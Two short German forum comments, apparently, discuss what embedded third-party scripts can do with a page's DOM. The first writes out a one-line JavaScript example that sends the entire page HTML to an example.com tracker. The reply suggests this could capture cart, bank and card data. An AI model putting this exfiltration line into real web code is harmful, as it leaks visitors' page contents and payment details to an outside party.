Die Manipulation des DOM-Trees ist oft genug der Zweck solcher Scripts. Ihn dazu auszulesen könnte unumgänglich sein. Und schon mit einem "new Image().src='//example.com/tracker?code='+escape(document.documentElement.innerHTML)"  hätte der Anbieter im Prinzip den Quellcode. Nur wozu?

um um zb warenkorbdaten bei nicht gesicherten verbindungen auszulesen "bitte prüfen sie nochmal ihre angaben: bankverbindung foo, kreditkartennummer bar" ;)